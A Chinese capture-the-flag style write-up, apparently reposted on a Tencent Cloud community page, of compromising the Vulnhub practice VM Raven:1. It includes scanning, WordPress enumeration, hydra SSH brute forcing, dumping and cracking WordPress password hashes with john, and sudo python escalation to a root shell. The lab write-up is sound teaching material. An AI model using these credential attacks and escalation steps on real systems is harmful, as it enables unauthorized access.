专栏首页HACK学习Vulnhub靶机渗透-Raven:1

Vulnhub靶机渗透-Raven:1

0x01 Scan Host

nmap -p 80,22,21,25,3389,443 192.168.8.0/24
or
netdiscover 192.168.8.0/24

来更加深入的扫描一下:

nmap -sS -sV -T5 -A -p- 192.168.8.156

0x02 Web Service

flag1

首先大致浏览了一遍,发现有个wordpress(建议把域名加入hosts):

用户名MICHAEL,既然是wp那就用wpscan,先更新下漏洞库:

wpscan --update

wpscan --url http://raven.local/wordpress/
  1. WordPress version 4.8.12
  2. Theme twentysenventeen version 1.3
root@NightsWatch:~/Desktop# searchsploit wordpress 4.8.12
Exploits: No Result
Shellcodes: No Result

//scan themes vulnerability
wpscan --url http://192.168.0.101/wordpress/ --enumerate vt

//scan pulgins vunlnerability
wpscan --url http://192.168.0.101/wordpress/ --enumerate vp

同时这个主题也没有发现有什么东西,所以考虑爆一下后台(字典无果可cewl生成):

爆破的同时我进行了0x03的操作,拿到michael的ssh账号后,可以直接写入shell,并且还没有爆出后台密码,所以停止。


0x03 SSH Service

Open SSH 6.7p1

并没有发现对应版本的Vunerability,用hydra爆一下:

hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local

并没有爆出密码,这里用cupp生成一个新的字典:

cupp -i

因为我们只知道目标姓名,其他一概不知,所以没有就回车.

爆出了密码,进入看看吧。


0x04 Privilege Escalation

michael@Raven:~$ uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

没什么可以利用的,再看一下SUID:

没什么可以直接用的,并且michael没有sudo权限,但是发现了flag2.

flag2

看一下网站配置文件,或许有root呢?

Mysql的root权限,尝试用这个密码去登录ssh,但是并没有成功,登陆steven也没成功.

flag3

wp_content中发现了flag3

select * from wp_posts\G

所以考虑看一下mysql中存放的wp的密码:

select * from wp_users\G
michael:$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

这直接解肯定解不开了,想用John破解一下(如有shadow和passwd也可用john):

SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt';

我们的字典用著名的rockyou,kali自带的:

root@NightsWatch:/usr/share/wordlists# ls
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gz

root@NightsWatch:/usr/share/wordlists# gzip -d rockyou.txt.gz

接下来用john:

john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt

emmm,先破着吧,要上操作系统原理了……

破出了steven的密码,尝试去登录ssh成功,因为前面内核和suid提权均失败,并且michael也没有sudo权限,那么看一下Steven是否有sudo权限:

sudo -l

尝试用sudo python执行shell:

sudo python3 -c 'import pty; pty.spawn("/bin/sh")'

emmm,失败……另一种:

sudo python -c 'import os; os.system("/bin/sh")'

flag4

0x05 Summary

本次渗透值得注意的地方就是:

  1. 社会工程学密码字典生成的应用
  2. john破解HASH的应用
  3. hydra爆破各种协议的应用
  4. 得到的密码可能通用:例如得到wp的密码可以尝试登陆ssh
  5. sudo提权
原创投稿作者:Railgun作者博客:www.pwn4fun.com

本文分享自微信公众号 - HACK学习呀(Hacker1961X),作者:Railgun

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-03-29

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 在树莓派上搭建LAMP(Linux Apache Mysql PHP)服务器

    本文将详细介绍如何在树莓派上配置服务器,和《教你在ubuntu上搭建LAMP服务器》有些类似,多了一些介绍在树莓派上的不同步骤的地方。这种服务器的配置被称为LA...

    HACK学习
  • 如何绕过cdn获取网站真实ip进行测试

    导语:一般网站会使用cdn防御,我们访问时会经过cdn再经过源站服务器,这样我们进行渗透测试很容易被拦截,我们的思路是这样的,通过找到源站ip之后,把IP添加到...

    HACK学习
  • 精华 | SQL注入万能Bypass技巧

    很多同学问注入bypass的一些细节,刚好前几天晚上做了一个梦,梦里进行了一些测试,今天觉得应该记录一下。

    HACK学习
  • wordpress发布文章报错HTTP 564解决办法

    关于wordpress发布文章更新文章经常报错http 564解决办法。我做网站三年了,站虽然不大但是也收录了5000多篇内容,放弃wordpress吧,wor...

    主机优惠教程
  • Dockerfile指令

    编写 Dockerfile 文件之后,可以通过 docker [image] build 命令来创建镜像,语法命令如下:

    喵叔
  • Python编程常见出错信息及原因分析(3)

    (1)不可哈希错误 演示代码: >>> x = {[1], [2]} Traceback (most recent call last): File "<p...

    Python小屋屋主
  • Docker教程06:镜像管理和创建

    当运行容器时,使用的镜像如果在本地中不存在,docker 就会自动从 docker 镜像仓库中下载,默认是从 Docker Hub 公共镜像源下载.下面我们来学...

    mojocn
  • Tomcat技术知识点总结

    一个 Tomcat 中有一个 Server,每个 Server 中至少有一个 Service。一个 Service 由至少一个 Connector 与一个 Co...

    剑影啸清寒
  • 图书管理系统设计与实现—看这篇就够了

    (1)掌握企业级应用系统的基本开发流程; (2)培养开发者掌握应用系统设计的基本思路和方法; (3)培养开发者分析、解决问题的能力;

    C you again 的博客
  • 点击input输入框实现页面跳转功能

    版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.n...

    林老师带你学编程

扫码关注云+社区

领取腾讯云代金券